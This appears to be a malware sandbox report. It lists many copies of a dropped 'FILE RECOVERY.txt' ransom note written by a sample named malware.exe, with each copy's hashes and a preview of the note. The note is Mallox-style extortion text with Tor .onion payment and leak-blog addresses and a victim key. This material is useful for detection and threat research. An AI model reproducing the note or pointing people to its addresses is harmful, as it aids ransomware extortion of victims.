                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Speech Recognition\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\WidevineCdm\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ZxcvbnData\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Feeds Cache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Feeds\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\FontCache\3\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\FontCache\4\Catalog\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Display\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Narrow\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\FontCache\4\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
